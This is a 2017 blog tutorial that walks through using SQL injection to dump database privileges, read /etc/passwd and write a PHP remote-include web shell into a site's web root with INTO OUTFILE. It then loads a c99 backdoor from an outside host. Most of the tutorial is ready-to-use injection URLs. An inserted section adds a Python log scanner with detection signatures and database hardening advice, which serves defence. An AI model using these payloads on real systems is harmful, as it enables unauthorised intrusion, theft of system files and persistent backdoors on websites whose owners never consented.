Monday, June 5, 2017

SQL Injection Uploading shell using root file privileges 70% Noob

!! FOR EDUCATIONAL PURPOSES ONLY  !!

I Introduction
So today I'm gonna teach you how to upload a shell using SQL Injection.

II Getting User
So first, get the current user using
user()
Or
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

www.website.com/news.php?id=19' and false union select 1,user(),3,4,5,6,7,8,9--+

www.website.com/news.php?id=19' and false union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8,9--+

If the user is root or the privilege output shows Y or Yes, then you're good to go.

III Getting the Full Path Disclosure
I've written a tutorial on how to get the Full Path Disclosure here.

Note: if you can't get the Full Path Disclosure, there's no way you can upload your shell, because you won't know where to save your backdoor.

Tips: Getting Full Path Disclosure

For some tips, if you really want to know the FPD, try reading the server's "/etc/passwd" using load_file().

www.website.com/news.php?id=19' and false union select 1,load_file("/etc/passwd"),3,4,5,6,7,8,9--+

Or if you still can't, try guessing the FPD. The common ones are "/var/www/", "/var/www/sitename", etc.

To make sure a guess is correct, try "/var/www/index.php" and visit www.website.com/index.php, then check if the source code is similar or the same.

IV Uploading the shell
Now that we have the full path, we can try uploading the shell. We're gonna use this script as our backdoor initiator:
<?php include $_GET["inc"];?>
www.website.com/news.php?id=19' and false union select 1,'<?php include($_GET["inc"]);?>',3,4,5,6,7,8,9 into outfile '/var/www/shell.php'--+
Once we visit that URL, we go here:

www.website.com/shell.php?inc=http://examplebackdoorwebsite.com/c99.txt

And voilà! You have successfully inserted a PHP backdoor into the website!

If it's 404 Not Found, then maybe the directory is not writable. You gotta find a directory that is writable.
The common writable directories are:
/uploads/
/images/
/videos/
or something like that.
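From the defender's side, every step above leaves a trace in the web server's access log. The following Python script is an added example (not part of the original post) that URL-decodes each request and flags the patterns used in this tutorial: UNION SELECT, load_file(), INTO OUTFILE, INFORMATION_SCHEMA, user() and the remote-include call to shell.php. The log lines are constructed and use documentation IP addresses.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques used in this tutorial, matched against the
# URL-decoded request path (case-insensitive).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
    "user_probe": re.compile(r"\buser\s*\(\s*\)", re.I),
    "remote_include": re.compile(r"=https?://", re.I),  # shell.php?inc=http://...
}

# Minimal combined-log-format parser: client IP and the request path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

def decode(path):
    """URL-decode until stable so double-encoded payloads (%2527) are caught too."""
    prev = None
    while prev != path:
        prev, path = path, unquote_plus(path)
    return path

def scan_line(line):
    """Return (ip, decoded_path, hits) for a log line, or None if nothing fires."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return (m.group("ip"), decoded, hits) if hits else None

def scan_log(lines):
    """Findings for every suspicious line; clean lines are skipped."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample log lines (documentation IPs), modelled on this tutorial's requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jun/2017:10:00:01 +0000] "GET /news.php?id=19 HTTP/1.1" 200 512',
    '203.0.113.5 - - [05/Jun/2017:10:00:02 +0000] "GET /news.php?id=19%27+and+false+union+select+1,user(),3,4,5,6,7,8,9--+ HTTP/1.1" 200 610',
    '203.0.113.5 - - [05/Jun/2017:10:00:03 +0000] "GET /news.php?id=19%27+and+false+union+select+1,load_file(%22/etc/passwd%22),3,4,5,6,7,8,9--+ HTTP/1.1" 200 2048',
    '203.0.113.5 - - [05/Jun/2017:10:00:04 +0000] "GET /news.php?id=19%27+and+false+union+select+1,%27x%27,3,4,5,6,7,8,9+into+outfile+%27/var/www/shell.php%27--+ HTTP/1.1" 500 0',
    '198.51.100.7 - - [05/Jun/2017:10:00:05 +0000] "GET /shell.php?inc=http://examplebackdoorwebsite.com/c99.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, path)
```

The same chain is closed off on the database side by running the web app with a MySQL account that lacks the FILE privilege and by keeping secure_file_priv set, so INTO OUTFILE and load_file() fail even when the injection itself succeeds.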

V Goodbye
Hope you learned something from my tutorial! I guess it's your job to enhance and explore. Good luck and have fun hacking!!
